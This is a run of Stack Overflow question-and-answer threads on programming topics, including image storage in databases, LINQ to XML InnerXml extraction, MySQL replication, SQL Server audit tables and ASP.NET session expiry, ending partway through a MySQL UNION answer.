*It is easier to control access to the images if they are in a database. Idle admins can access any folder on disk. It takes a really determined admin to go snooping in a database to extract the images

On the other hand there are problems associated:

*

*Requires additional code to extract and stream the images
*Latency may be slower than direct file access
*Heavier load on the database server
A: Normally, I'm strongly against taking the most expensive and hardest-to-scale part of your infrastructure (the database) and putting all the load into it. On the other hand: it greatly simplifies backup strategy, especially when you have multiple web servers and need to somehow keep the data synchronized.
Like most other things, it depends on the expected size and budget.
A: We have implemented a document imaging system that stores all its images in SQL 2005 blob fields. There are several hundred GB at the moment and we are seeing excellent response times and little or no performance degradation. In addition, for regulatory compliance, we have a middleware layer that archives newly posted documents to an optical jukebox system which exposes them as a standard NTFS file system.
We've been very pleased with the results, particularly with respect to:
*
*Ease of Replication and Backup
*Ability to easily implement a document versioning system
A: If this is web-based application then there could be advantages to storing the images on a third-party storage delivery network, such as Amazon's S3 or the Nirvanix platform.
A: Assumption: Application is web enabled/web based
I'm surprised no one has really mentioned this ... delegate it out to others who are specialists -> use a 3rd party image/file hosting provider.
Store your files on a paid online service like
*
*Amazon S3
*Mosso Cloud Storage
Another StackOverflow threads talking about this here.
This thread explains why you should use a 3rd party hosting provider.
It's so worth it. They store it efficiently, and no bandwidth is consumed serving files from your servers to client requests, etc.
A: If you're not on SQL Server 2008 and you have some solid reasons for putting specific image files in the database, then you could take the "both" approach and use the file system as a temporary cache and use the database as the master repository.
For example, your business logic can check if an image file exists on disc before serving it up, retrieving from the database when necessary. This buys you the capability of multiple web servers and fewer sync issues.
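A minimal sketch of that check (both helper methods are hypothetical):
// Serve from the on-disk cache when possible; fall back to the database master copy
static string EnsureCached(int imageId)
{
    string cachePath = GetCachePath(imageId);         // hypothetical path helper
    if (!File.Exists(cachePath))
    {
        byte[] data = LoadImageFromDatabase(imageId); // hypothetical DB fetch
        File.WriteAllBytes(cachePath, data);
    }
    return cachePath;
}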
A: Your web-server (I'm assuming you are using one) is designed to handle images while a database is not. Thus I would vote heavily on the nay side.
Store just the path (and maybe file info too) in the database.
A: I would personally store the large data outside of the database.
Pros: Stores everything in one place, easy access to data files, easy backup
Cons: Decreases database performance, many page splits, possible database corruption
A: The only reason we store images in our tables is because each table (or set of tables per range of work) is temporary and dropped at the end of the workflow. If there was any sort of long term storage we'd definitely opt for storing file paths.
It should also be noted that we work with a client/server application internally so there's no web interface to worry about.
A: If you need to store lots of images on the file system a couple of things to think about include:
*
*Backup and restore. How do you keep the images in sync.
*Filesystem performance. Depends on what you are doing and the filesystem, but you may want to implement a hashing mechanism so that you don't have a single directory with billions of files.
*Replication. Do you need to keep the files in sync between multiple servers?
A: As someone mentioned already, "it depends". If storage in a database is supposed to be a 1-to-1 fancy replacement for the filesystem, it may not be quite the best option.
However, if a database backend will provide additional value, not only serialization and storage of a blob, then it may make real sense.
You may take a look at WKT Raster, which is a project aiming at developing raster support in PostGIS, which in turn serves as a geospatial extension for the PostgreSQL database system. The idea behind WKT Raster is not only to define a format for raster serialization and storage (using the PostgreSQL system), but, what's much more important than storage, to specify database-side efficient image processing accessible from SQL. Long story short, the idea is to move the operational weight from the client to the database backend, so it takes place as close to the storage itself as possible. WKT Raster, like PostGIS, is dedicated to applications of a specific domain, GIS.
For more complete overview, check the website and presentation (PDF) of the system.
A: Attempting to mimic a file system using SQL is generally a bad plan. You ultimately write less code with equal or better results if you stick with the file system for external storage.
A: Pulling loads of binary data out of your DB over the wire is going to cause huge latency issues and won't scale well.
Store paths in the DB and let your webserver take the load - it's what it was designed for!
A: File system, for sure. Then you get to use all of the OS functionality to deal with these images - backups, the webserver, even just scripting batch changes using tools like ImageMagick. If you store them in the DB then you'll need to write your own code to solve these problems.
A: One thing you need to keep in mind is the size of your data set. I believe that Dillie-O was the only one who even remotely hit the point.
If you have a small, single user, consumer app then I would say DB. I have a DVD management app that uses the file system (in Program Files at that) and it is a PIA to backup. I wish EVERY time that they would store them in a db, and let me choose where to save that file.
For a larger commercial application then I would start to change my thinking. I used to work for a company that developed the county clerks information management application. We would store the images on disk, in an encoded format [to deal with FS problems with large numbers of files] based on the county assigned instrument number. This was useful on another front as the image could exist before the DB record (due to their workflow).
As with most things: 'It depends on what you are doing'
A: Another benefit of storing the images in the file system is that you don't have to do anything special to have the client cache them...
...unless of course the image isn't accessible via the document root (e.g. authentication barrier), in which case you'll need to check the cache-control headers your code is sending.
A: I prefer to store image paths in the DB and images on the filesystem (with rsync between servers to keep everything reasonably current).
However, some of the content-management-system stuff I do needs the images in the CMS for several reasons: visibility control (so the asset is held back until the press release goes out), versioning, reformatting (some CMSs will dynamically resize for thumbnails) and ease of use for linking the images into the WYSIWYG pages.
So the rule of thumb for me is to always stash application stuff on the filesystem, unless it's CMS driven.
A: I would go with the file system approach. No need to create or maintain a DB with images, it will save you some major headaches in the long run.
A: I would go with the file system approach, primarily due to its better flexibility. Consider that if the number of images gets huge, one database may not be able to handle it. With the file system, you can simply add more file servers, assuming that you're using NFS or the like.
Another advantage the file system approach has is the ability to do some fancy stuff, such as using Amazon S3 as the primary storage (saving the URL in the database instead of the file path). In case an outage happens to S3, you fall back to your file server (maybe another database entry containing the file path). Some voodoo to apply to Apache or whatever web server you're using.
A: Database for data
Filesystem for files
A: I'd almost never store them in the DB. The best approach is usually to store your images in a path controlled by a central configuration variable and name the images according to the DB table and primary key (if possible). This gives you the following advantages:
*
*Move your images to another partition or server just by updating the global config.
*Find the record matching the image by searching on its primary key.
*Your images are accessible to processing tools like ImageMagick.
*In web-apps your images can be handled by your webserver directly (saving processing).
*CMS tools and web languages like Coldfusion can handle uploading natively.
A: I have worked with many digital storage systems and they all store digital objects on the file system. They tend to use a branch approach, so there will be an archive tree on the file system, often starting with year of entry e.g. 2009, a subdirectory for month e.g. 8 for August, the next directory for day e.g. 11, and sometimes they will use the hour as well; the file will then be named with the record's persistent ID. Using BLOBs has its advantages and I have heard of it being used often in the IT parts of the chemical industry for storing thousands or millions of photographs and diagrams. It can provide more granular security, a single method of backup, potentially better data integrity and improved inter-media searching; Oracle has many features for this within the package they used to call Intermedia (I think it is called something else now). The file system can also have granular security provided through a system such as XACML or another XML-type security object. See DSpace or the Fedora object store for examples.
A: For a large number of small images, the database might be better.
I had an application with many small thumbnails (2Kb each). When I put them on the filesystem, they each consumed 8kb, due to the filesystem's blocksize. A 400% increase in space!
See this post for more information on block size:
What is the block size of the iphone filesystem?
A: If you are on Teradata, then Teradata Developer Exchange has a detailed article on loading and retrieving lobs and blobs..
http://developer.teradata.com/applications/articles/large-objects-part-1-loading
A: I would go for both solutions. I mean... I would develop a little component (EJB) that stores the images in a DB plus the path of each image on the server. This DB would only be updated if we have a new image or the original image is updated. Then I would also store the path in the business DB.
From an application point of view, I would always use the file system (retrieving the path from the business DB), and this way we fix the backup issue and also avoid possible performance issues.
The only weakness is that we would store the same image twice... the good point is that storage is cheap, come on!
A: I would go with the file system approach. As noted by a few others, most web servers are built to send images from a file path. You'll have much higher performance if you don't have to write or stream out BLOB fields from the database. Having filesystem storage for the images makes it easier to setup static pages when the content isn't changing or you want limit the load on the database.
A: No, due to page splits. You're essentially defining rows that can be 1KB to n MB, so your database will have a lot of empty space in its pages, which is bad for performance.
A: In my current application, I'm doing both. When the user identifies an image to attach to a record, I use ImageMagick to resize it to an appropriate size for display on screen (about 300x300 for my application) and store that in the database for ease of access, but then also copy the user's original file to a network share so that it's available for applications that require higher resolution (like printing).
(There are a couple other factors involved as well: Navision will only display BMPs, so when I resize it I also convert to BMP for storage, and the database is replicated to remote sites where it's useful to be able to display the image. Printing is only done at the head office, so I don't need to replicate the original file.)
A: In my little application I have at least a million files weighing in at about 200GB at last count. All the files are sitting in an XFS file system mounted on a Linux server over iSCSI. The paths are stored in the database. Use some kind of intelligent naming convention for your file paths and file names.
IMHO, use the file system for what it was meant to do - store files. Databases generally do not offer you any advantage over a standard file system in storing binary data.
A: Images on a file store are the best bet, and supplement this with storing the meta data in a database. From a web server perspective, the fast way to serve stuff up is to point to it directly. If it's in the database - ala Sharepoint - you have the overhead of ADO.Net to pull it out, stream it, etc.
Documentum - while bloated and complicated - has it right in that the files are out on the share and available for you to determine how to store them - disk on the server, SAN, NAS, whatever. The Documentum strategy is to store the files in a tree structure by encoding the folders and file names according to their primary key in the DB. The DB becomes the resource for knowing what files are what and for enforcing security. For high volume systems this type of approach is a good way to go.
Also consider this when dealing with metadata: should you ever need to update the attributes of your metadata corpus, the DB is your friend, as you can quickly perform the updates with SQL. With other tagging systems you do not have such easy data manipulation tools at hand.
A: If you are planning a public facing web site then you should not go with either option. Your should use a Content Delivery Network (CDN). There are price, scalability and speed advantages to a CDN when delivering a large amount of static content over the internet.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3748",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "415"
} |
Q: Looking for code to render a form that displays a view of an object I've got the task of displaying a web form to represent the properties in a .NET class. In WinForms, there's a pre-fab control named PropertyGrid that is a lot like what I need. I'm just looking for something to display a simple layout of property names next to an appropriate control like a textbox for strings or a dropdownlist for enum properties.
Does anything like this already exist for ASP.NET, or will I be rolling my own here?
A: ASP.Net PropertyGrid
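If you do end up rolling your own, a rough reflection-based sketch (the control choices and names are illustrative, not an existing library):
using System;
using System.Reflection;
using System.Web.UI;
using System.Web.UI.WebControls;

// Adds a label plus an appropriate input control for each public property
static void BuildForm(object target, Control container)
{
    foreach (PropertyInfo prop in target.GetType().GetProperties())
    {
        container.Controls.Add(new Label { Text = prop.Name });

        if (prop.PropertyType.IsEnum)
        {
            // Enum properties get a dropdown of the enum's names
            var list = new DropDownList { ID = prop.Name };
            foreach (string name in Enum.GetNames(prop.PropertyType))
                list.Items.Add(name);
            list.SelectedValue = prop.GetValue(target, null).ToString();
            container.Controls.Add(list);
        }
        else
        {
            // Everything else falls back to a text box
            var box = new TextBox { ID = prop.Name };
            box.Text = Convert.ToString(prop.GetValue(target, null));
            container.Controls.Add(box);
        }
    }
}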
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3757",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Prototyping a GUI with a customer When prototyping initial GUI functionality with a customer is it better to use a pen/paper drawing or to mock something up using a tool and show them that ?
The argument against a tool generated design being that the customer can sometimes focus on the low-level specifics of the mock-up rather than taking a higher level functional view of the GUI overall.
A: I would suggest you sit down with your client and use a tool like Mockupscreens and develop the UI interactively. A benefit it has over Napkin LAF is that it does not require coding, or indeed development tools of any kind
A: Check out Balsamiq
It does the "THIS IS NOT A FUNCTIONAL APP" napkin view very well and is easy to use.
Has a full featured demo you can try out online and as an added bonus you can email your XML to your client and they can tweak it and play with it and email it back to you without having to have a license.
A: There is a book called Paper Prototyping which details pen and paper drawing and what you can gain from it. I think it has a lot of benefits, particularly that you can, very early on (and easily), modify what the end result will be without much effort, and then start off on the right foot.
A: A basic paper version is the way to go for an initial mock-up. It's been my experience that if you do a "real" mock-up, even if you explain to the customer that it's a non-functional mock-up, they are confused when things don't work.
Bottom line: keep it as simple as possible. If it's on paper, there is no way the customer will confuse it with a working product.
A: For the first draft, I prefer to use graph paper (the stuff with a grid printed on it) and a pencil. The graph paper is great for helping to maintain proportions. Once the client and I have come to a conclusion I'll usually fill in the drawing with pen since pencil is prone to fading.
When I actually get around to building the digital prototype, I'll scan in the hand-drawn one and use it as a background template. Seems to work pretty well for me.
A: I think it is best to start with Paper/Whiteboards/White walls.
Once you have the basic structure, you can move it to Visio with the wireframe stencils
*
*(Download a Stencil Kit)
*(Visio Stencils for Information Architects).
Or you could use Denim (An Informal Tool For Early Stage Web Site and UI Design) with a tablet PC or Wacom tablets to design the GUI and run it as HTML website.
A: WireframeSketcher is a tool that helps quickly create wireframes, mockups and prototypes for desktop, web and mobile applications. It comes both as a standalone version and as a plug-in for Eclipse IDEs. It has some distinctive features like storyboards, components, linking and vector PDF export. Among supported IDEs are are Aptana, Flash Builder, Zend Studio and Rational Application Developer.
A: Always start with paper or paper-like mock-ups first. You do not want to fall into a trap of giving the impression of completeness when the back-end is completely hollow.
A polished prototype or pixel-perfect example puts too much emphasis on the design. With an obvious sketch, you have a better shot of discussing desired functionality and content rather than colors, photos, and other stylistic matters. There will be time for that discussion later in the project.
Jeff discusses paper prototyping in his Coding Horror article UI-First Software Development
Click the "Watch a video!" link at twitter.com to see an interesting take on the idea from Common Craft.
A: The "Napkin Look & Feel" for Java is really cool for prototyping. An actual, functioning, clickable app that looks like it was drawn on a napkin. Check out this screenshot:
Seriously, how cool is that?
A: I've recently used a Windows app to prototype an application for a customer (the final interface has to be integrated into a website).
At first people thought that it would be the final version, and they started to make very heavy criticism, from the way controls were displayed to the words I had used (terminology and stuff), and the meeting time ended before we could even discuss the functionality itself.
That discussion dragged on for days and days until I told them that, it being a mock-up (and not a final application), all input was welcome, but we had to focus on the functionality first and then we could move on to look and feel as well as terminology issues.
From that meeting on I am always terrified of prototypes and mock-ups... Perhaps I should just have given them something made in Visio instead.
A: You can try out ForeUI; it allows prototyping with different styles. What's more, it can make an interactive prototype and run it in the browser.
A: For a non-installation browser based tool you can try draft-it
It's free - and if you have a gmail account - no registration is needed.
It makes interactive, step-by-step, or slide-show prototypes. You can share your prototype with anyone you choose by just sending a link.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3781",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Is there a WMI Redistributable Package? I've been working on a project that accesses the WMI to get information about the software installed on a user's machine. We've been querying Win32_Product only to find that it doesn't exist in 64-bit versions of Windows because it's an "optional component".
I know there are a lot of really good alternatives to querying the WMI for this information, but I've got a bit of a vested interest in finding out how well this is going to work out.
What I want to know is if there's some kind of redistributable that can be packaged with our software to allow 64-bit users to get the WMI Installer Provider put onto their machines? Right now, they have to install it manually and the installation requires they have their Windows disc handy.
Edit:
You didn't mention for what OS, but the WMI Redistributable Components version 1.0 definitely exists.
For the operating system: we've been using .NET 3.5, so we need packages that will work on XP64 and 64-bit versions of Windows Vista.
A: You didn't mention for what OS, but the WMI Redistributable Components version 1.0 definitely exists.
For Windows Server 2003, the WMI SDK and redistributables are part of the Server SDK
I believe that the same is true for the Server 2008 SDK
A: Wouldn't the normal approach for a Windows component be that the administrators of a set of servers use whatever their local software push technology (i.e. SMS) to ensure that component is installed? This is not that uncommon of a requirement for the remote management of servers via WMI.
By the way, the WMI Installer Provider is not provided in the Standard Edition of the server products, but it is in the Enterprise Edition. So, Windows 2003 Server will not have this installed by default, but Windows 2003 Server Enterprise (and DataCenter) will.
This answer does imply that you are putting the burden of installation back on your user base, but for Windows administrators this should not be any issue.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3790",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Best way to get InnerXml of an XElement? What's the best way to get the contents of the mixed body element in the code below? The element might contain either XHTML or text, but I just want its contents in string form. The XmlElement type has the InnerXml property which is exactly what I'm after.
The code as written almost does what I want, but includes the surrounding <body>...</body> element, which I don't want.
XDocument doc = XDocument.Load(new StreamReader(s));
var templates = from t in doc.Descendants("template")
where t.Attribute("name").Value == templateName
select new
{
Subject = t.Element("subject").Value,
Body = t.Element("body").ToString()
};
A: I think this is a much better method (in VB, shouldn't be hard to translate):
Given an XElement x:
Dim xReader = x.CreateReader
xReader.MoveToContent
xReader.ReadInnerXml
A: I ended up using this:
Body = t.Element("body").Nodes().Aggregate("", (b, node) => b += node.ToString());
A: Personally, I ended up writing an InnerXml extension method using the Aggregate method:
public static string InnerXml(this XElement thiz)
{
return thiz.Nodes().Aggregate( string.Empty, ( element, node ) => element += node.ToString() );
}
My client code is then just as terse as it would be with the old System.Xml namespace:
var innerXml = myXElement.InnerXml();
A: I wanted to see which of these suggested solutions performed best, so I ran some comparative tests. Out of interest, I also compared the LINQ methods to the plain old System.Xml method suggested by Greg. The variation was interesting and not what I expected, with the slowest methods being more than 3 times slower than the fastest.
The results ordered by fastest to slowest:
*
*CreateReader - Instance Hunter (0.113 seconds)
*Plain old System.Xml - Greg Hurlman (0.134 seconds)
*Aggregate with string concatenation - Mike Powell (0.324 seconds)
*StringBuilder - Vin (0.333 seconds)
*String.Join on array - Terry (0.360 seconds)
*String.Concat on array - Marcin Kosieradzki (0.364)
Method
I used a single XML document with 20 identical nodes (called 'hint'):
<hint>
<strong>Thinking of using a fake address?</strong>
<br />
Please don't. If we can't verify your address we might just
have to reject your application.
</hint>
The numbers shown as seconds above are the result of extracting the "inner XML" of the 20 nodes, 1000 times in a row, and taking the average (mean) of 5 runs. I didn't include the time it took to load and parse the XML into an XmlDocument (for the System.Xml method) or XDocument (for all the others).
The LINQ algorithms I used were: (C# - all take an XElement "parent" and return the inner XML string)
CreateReader:
var reader = parent.CreateReader();
reader.MoveToContent();
return reader.ReadInnerXml();
Aggregate with string concatenation:
return parent.Nodes().Aggregate("", (b, node) => b += node.ToString());
StringBuilder:
StringBuilder sb = new StringBuilder();
foreach(var node in parent.Nodes()) {
sb.Append(node.ToString());
}
return sb.ToString();
String.Join on array:
return String.Join("", parent.Nodes().Select(x => x.ToString()).ToArray());
String.Concat on array:
return String.Concat(parent.Nodes().Select(x => x.ToString()).ToArray());
I haven't shown the "Plain old System.Xml" algorithm here as it's just calling .InnerXml on nodes.
Conclusion
If performance is important (e.g. lots of XML, parsed frequently), I'd use Daniel's CreateReader method every time. If you're just doing a few queries, you might want to use Mike's more concise Aggregate method.
If you're using XML on large elements with lots of nodes (maybe 100's), you'd probably start to see the benefit of using StringBuilder over the Aggregate method, but not over CreateReader. I don't think the Join and Concat methods would ever be more efficient in these conditions because of the penalty of converting a large list to a large array (even obvious here with smaller lists).
A: How about using this "extension" method on XElement? It worked for me!
public static string InnerXml(this XElement element)
{
StringBuilder innerXml = new StringBuilder();
foreach (XNode node in element.Nodes())
{
// append node's xml string to innerXml
innerXml.Append(node.ToString());
}
return innerXml.ToString();
}
OR use a little bit of Linq
public static string InnerXml(this XElement element)
{
StringBuilder innerXml = new StringBuilder();
element.Nodes().ToList().ForEach( node => innerXml.Append(node.ToString()));
return innerXml.ToString();
}
Note: The code above has to use element.Nodes() as opposed to element.Elements(). It is very important to remember the difference between the two: element.Nodes() gives you every child node (XText, XComment, nested XElement, etc.), whereas element.Elements() returns only the XElement children.
A: @Greg: It appears you've edited your answer to be a completely different answer. To which my answer is yes, I could do this using System.Xml but was hoping to get my feet wet with LINQ to XML.
I'll leave my original reply below in case anyone else wonders why I can't just use the XElement's .Value property to get what I need:
@Greg: The Value property concatenates all the text contents of any child nodes. So if the body element contains only text it works, but if it contains XHTML I get all the text concatenated together but none of the tags.
A: With all due credit to those who discovered and proved the best approach (thanks!), here it is wrapped up in an extension method:
public static string InnerXml(this XNode node) {
using (var reader = node.CreateReader()) {
reader.MoveToContent();
return reader.ReadInnerXml();
}
}
A: Keep it simple and efficient:
String.Concat(node.Nodes().Select(x => x.ToString()).ToArray())
*
*Aggregate is memory and performance inefficient when concatenating strings
*Using Join("", sth) is using two times bigger string array than Concat... And looks quite strange in code.
*Using += looks very odd, but apparently is not much worse than using '+' - probably would be optimized to the same code, because the assignment result is unused and might be safely removed by the compiler.
*StringBuilder is so imperative - and everybody knows that unnecessary "state" sucks.
A: // using Regex might be faster to simply trim the begin and end element tag
var content = element.ToString();
var matchBegin = Regex.Match(content, @"<.+?>");
content = content.Substring(matchBegin.Index + matchBegin.Length);
var matchEnd = Regex.Match(content, @"</.+?>", RegexOptions.RightToLeft);
content = content.Substring(0, matchEnd.Index);
A: doc.ToString() or doc.ToString(SaveOptions) does the work.
See http://msdn.microsoft.com/en-us/library/system.xml.linq.xelement.tostring(v=vs.110).aspx
A: Is it possible to use the System.Xml namespace objects to get the job done here instead of using LINQ? As you already mentioned, XmlNode.InnerXml is exactly what you need.
A: Wondering if (notice I got rid of the b+= and just have b+)
t.Element( "body" ).Nodes()
.Aggregate( "", ( b, node ) => b + node.ToString() );
might be slightly less efficient than
string.Join( "", t.Element.Nodes()
.Select( n => n.ToString() ).ToArray() );
Not 100% sure...but glancing at Aggregate() and string.Join() in Reflector...I think I read it as Aggregate just appending a returning value, so essentially you get:
string = string + string
versus string.Join, it has some mention in there of FastStringAllocation or something, which makes me think the folks at Microsoft might have put some extra performance boost in there. Of course my .ToArray() call may negate that, but I just wanted to offer up another suggestion.
A: You know, the best thing to do may be to go back to CDATA. :( I'm looking at the solutions here, but I think CDATA is by far the simplest and cheapest, though not the most convenient to develop with.
A: var innerXmlAsText= XElement.Parse(xmlContent)
.Descendants()
.Where(n => n.Name.LocalName == "template")
.Elements()
.Single()
.ToString();
Will do the job for you
A: public static string InnerXml(this XElement xElement)
{
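// Note: this naive Replace approach assumes the start tag carries no attributes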
//remove start tag
string innerXml = xElement.ToString().Trim().Replace(string.Format("<{0}>", xElement.Name), "");
////remove end tag
innerXml = innerXml.Trim().Replace(string.Format("</{0}>", xElement.Name), "");
return innerXml.Trim();
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3793",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "153"
} |
Q: Full complete MySQL database replication? Ideas? What do people do? Currently I have two Linux servers running MySQL, one sitting on a rack right next to me under a 10 Mbit/s upload pipe (main server) and another some couple of miles away on a 3 Mbit/s upload pipe (mirror).
I want to be able to replicate data on both servers continuously, but have run into several roadblocks. One of them being, under MySQL master/slave configurations, every now and then, some statements drop (!), meaning; some people logging on to the mirror URL don't see data that I know is on the main server and vice versa. Let's say this happens on a meaningful block of data once every month, so I can live with it and assume it's a "lost packet" issue (i.e., god knows, but we'll compensate).
The other most important (and annoying) recurring issue is that, when for some reason we do a major upload or update (or reboot) on one end and have to sever the link, then LOAD DATA FROM MASTER doesn't work and I have to manually dump on one end and upload on the other, quite a task nowadays moving some .5 TB worth of data.
Is there software for this? I know MySQL (the "corporation") offers this as a VERY expensive service (full database replication). What do people out there do? The way it's structured, we run an automatic failover where if one server is not up, then the main URL just resolves to the other server.
A: We at Percona offer free tools to detect discrepancies between master and slave, and to get them back in sync by re-applying minimal changes.
*
*pt-table-checksum
*pt-table-sync
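In practice the workflow looks something like this (flags and DSNs here are illustrative; check the current documentation before running):
pt-table-checksum --replicate=percona.checksums h=master_host,u=user,p=pass
pt-table-sync --print --replicate=percona.checksums h=master_host,u=user,p=pass
Replace --print with --execute once you are happy with the statements it would run.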
A: GoldenGate is a very good solution, but probably as expensive as the MySQL replicator.
It basically tails the journal, and applies changes based on what's committed. They support bi-directional replication (a hard task), and replication between heterogenous systems.
Since they work by processing the journal file, they can do large-scale distributed replication without affecting performance on the source machine(s).
A: I have never seen dropped statements, but there is a bug where network problems could cause relay log corruption. Make sure you don't run MySQL without this fix.
Documented in the 5.0.56, 5.1.24, and 6.0.5 changelogs as follows:
Network timeouts between the master and the slave could result
in corruption of the relay log.
http://bugs.mysql.com/bug.php?id=26489
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3798",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: More vs. Faster Cores on a Webserver The discussion of dual vs. quad-core is as old as the quad-cores themselves, and the answer is usually "it depends on your scenario". So here the scenario is a web server (Windows 2003 (not sure if x32 or x64), 4 GB RAM, IIS, ASP.net 3.0).
My impression is that the CPU in a Webserver does not need to be THAT fast because requests are usually rather lightweight, so having more (slower) cores should be a better choice as we got many small requests.
But since I do not have much experience with IIS load balancing and since I don't want to spend a lot of money only to find out I've made the wrong choice, can someone who has a bit more experience comment on whether or not More Slower or Fewer Faster cores is better?
A: We use apache on linux, which forks a process to handle requests. We've found that more cores help our throughput, since they reduce the latency of processes waiting to be placed on the run queue. I don't have much experience with IIS, but I imagine the same scenario applies with its thread pool.
A: Mark Harrison said:
I don't have much experience with IIS, but I imagine the same scenario applies with its thread pool.
Indeed - more cores = more threads running concurrently. IIS is inherently multithreaded, and takes easy advantage of this.
A: For something like a webserver, dividing up the tasks of handling each connection is (relatively) easy. I'd say it's safe to say that web serving is one of the most common (and most ironed-out) uses of parallel code. And since you are able to split up much of the processing into multiple discrete threads, more cores actually do benefit you. This is one of the big reasons why shared hosting is even possible. If server software like IIS and Apache couldn't run requests in parallel, it would mean that every page request would have to be dished out in a queue fashion... likely making load times unbearably slow.
This is also why high-end server operating systems like Windows 2008 Server Enterprise support something like 64 cores and 2 TB of RAM. These are applications that can actually take advantage of that many cores.
Also, since each request likely has a low CPU load, you can probably (for some applications) get away with more, slower cores. But obviously having each core faster can mean being able to get each task done quicker and, in theory, handle more tasks and more server requests.
A: The more the better. As programming languages become more complex and abstract, more processing power will be required.
At least Jeff believes quad-core is better.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3801",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How do you typeset code elements in normal text? What is the best way to typeset a function with arguments for readibility, brevity, and accuracy? I tend to put empty parentheses after the function name like func(), even if there are actually arguments for the function. I have trouble including the arguments and still feeling like the paragraph is readable.
Any thoughts on best practices for this?
A: I usually take that approach, but if I feel like it's going to cause confusion, I'll use ellipses like: myFunction(...)
I guess if I were good, I would use those any time I was omitting parameters from a function in text.
A: I would simply be a little more careful with the names of my variables and parameters; most people will then be able to guess much more accurately what type of data you want to hold in them.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3802",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Setup Visual Studio 2005 to print line numbers How can I get line numbers to print in Visual Studio 2005 when printing code listings?
A: Isn't there an option in the Print Dialog?
Edit: There is. Go to File => Print, and then in the bottom left there is "Print what" and then "Include line Numbers"
A: There is an option in the Print dialog to do the same (in VS 2005 and 2008 at least)!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3809",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: Suggestions for implementing audit tables in SQL Server? One simple method I've used in the past is basically just creating a second table whose structure mirrors the one I want to audit, and then create an update/delete trigger on the main table. Before a record is updated/deleted, the current state is saved to the audit table via the trigger.
While effective, the data in the audit table is not the most useful or simple to report off of. I'm wondering if anyone has a better method for auditing data changes?
There shouldn't be too many updates of these records, but it is highly sensitive information, so it is important to the customer that all changes are audited and easily reported on.
A: We are using a two-table design for this.
One table holds data about the transaction (database, table name, schema, column, the application that triggered the transaction, the host name of the login that started it, date, number of affected rows, and a couple more).
The second table is only used to store data changes, so that we can undo changes if needed and report on old/new values.
Another option is to use a third-party tool for this, such as ApexSQL Audit, or the Change Data Capture feature in SQL Server.
A: I have found these two links useful:
Using CLR and single audit table.
Creating a generic audit trigger with SQL 2005 CLR
Using triggers and separate audit table for each table being audited.
How do I audit changes to SQL Server data?
A: How much writing vs. reading of this table(s) do you expect?
I've used a single audit table, with columns for Table, Column, OldValue, NewValue, User, and ChangeDateTime - generic enough to work with any other changes in the DB, and while a LOT of data got written to that table, reports on that data were sparse enough that they could be run at low-use periods of the day.
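A minimal T-SQL sketch of that kind of generic audit trigger, for a hypothetical dbo.Customer(Id, Name) table (one row written per changed column):
CREATE TRIGGER trg_Customer_Audit ON dbo.Customer
AFTER UPDATE, DELETE
AS
BEGIN
    SET NOCOUNT ON;
    -- 'deleted' holds the old state; 'inserted' is empty for a DELETE
    INSERT INTO AuditLog ([Table], [Column], OldValue, NewValue, [User], ChangeDateTime)
    SELECT 'Customer', 'Name', d.Name, i.Name, SUSER_SNAME(), GETDATE()
    FROM deleted d
    LEFT JOIN inserted i ON i.Id = d.Id
    WHERE i.Id IS NULL OR i.Name <> d.Name;
END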
Added:
If the amount of data vs. reporting is a concern, the audit table could be replicated to a read-only database server, allowing you to run reports whenever necessary without bogging down the master server from doing their work.
A: Are there any built-in audit packages? Oracle has a nice package, which will even send audit changes off to a separate server outside the access of any bad guy who is modifying the SQL.
Their example is awesome... it shows how to alert on anybody modifying the audit tables.
A: OmniAudit might be a good solution for you need. I've never used it before because I'm quite happy writing my own audit routines, but it sounds good.
A: I use the approach described by Greg in his answer and populate the audit table with a stored procedure called from the table triggers.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3823",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "32"
} |
Q: How do I best detect an ASP.NET expired session? I need to detect when a session has expired in my Visuial Basic web application. This is what I'm using...
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
If CurrentSession.IsNew AndAlso (Not Page.Request.Headers("Cookie") Is Nothing) AndAlso (Page.Request.Headers("Cookie").IndexOf("ASP.NET_SessionId") >= 0) Then
Response.Redirect("TimeOut.aspx")
End If
...do something...
End Sub
Note: CurrentSession.IsNew returns HttpContext.Current.Session.IsNewSession
This seems to work well for Internet Explorer, but seems to fail with Firefox.
A: Try the following
If Session("whatever") IsNot Nothing Then
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3831",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: How do I Concatenate entire result sets in MySQL? I'm trying out the following query:
SELECT A,B,C FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query%'
GROUP BY B ORDER BY B ASC LIMIT 5
That's three queries stuck together, kinda sorta. However, the result set that comes back reflects results from query #3 before the results from query #1 which is undesired.
Is there any way to prioritize these so that results come as all for query #1, then all for query #2, then all for query #3? I don't want to do this in PHP just yet (not to mention having to ensure that results that showed up in the first query don't show up in the second, and so forth).
A: Add an additional column with hard-coded values that you will use to sort the overall resultset, like so:
SELECT A,B,C,1 as `order` FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C,2 as `order` FROM table WHERE field LIKE '%query'
UNION
